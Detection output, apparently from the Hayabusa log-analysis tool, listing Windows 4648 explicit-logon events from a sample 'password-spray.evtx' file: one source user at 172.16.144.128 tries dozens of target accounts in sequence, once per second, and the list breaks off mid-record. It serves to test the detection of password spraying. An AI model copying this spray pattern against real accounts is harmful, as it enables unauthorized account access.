DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 